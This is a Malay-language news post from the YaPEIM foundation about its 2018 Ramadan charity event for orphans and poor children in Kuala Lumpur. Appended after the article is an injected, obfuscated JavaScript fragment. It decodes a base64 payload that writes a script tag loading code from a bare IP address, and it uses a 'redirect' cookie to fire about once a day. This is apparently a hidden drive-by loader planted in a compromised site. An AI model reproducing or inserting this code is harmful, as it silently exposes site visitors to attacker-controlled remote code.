YaPEIM » PROGRAM INSPIRASI RAMADHAN YaPEIM 2018/1439H DI WANGSA MAJU, KUALA LUMPUR

Terkini

PROGRAM INSPIRASI RAMADHAN YaPEIM 2018/1439H DI WANGSA MAJU, KUALA LUMPUR

Program Inspirasi Ramadhan YaPEIM mula dilaksanakan pada 2016 dan diteruskan pada 2017 di seluruh negara bagi menyantuni anak yatim & miskin disamping menghidupkan ramadhan dengan aktiviti keagamaan dan kebajikan.

KUALA LUMPUR, 1 Jun 2018 – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) hari ini meraikan kira-kira 1,000 anak yatim dan miskin di Masjid Usamah Zaid Wangsa Maju, Kuala Lumpur sempena Program Inspirasi Ramadhan YaPEIM 2018 bersamaan 1439H.

Pengerusi YaPEIM, YBhg. Tan Sri Dato’ Hj Othman Mustapha telah menyampaikan sumbangan berupa wang tunai RM100 setiap seorang dan barangan berbentuk bahan bacaan.

Bagi Wilayah Persekutuan Kuala Lumpur, sejumlah RM120,000 peruntukkan diagih kepada 1,000 orang anak yatim & miskin.

Bagi tahun 2018, YaPEIM memperuntukkan RM2.3 juta bagi menjayakan majlis dengan menyantuni 14,000 orang penerima sumbangan di 16 buah lokasi seluruh negara.

Sehingga kini, YaPEIM membelanjakan lebih RM7 juta bagi pelaksanaan program ini dengan melibatkan lebih 60,000 orang penerima manfaat keseluruhannya.

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top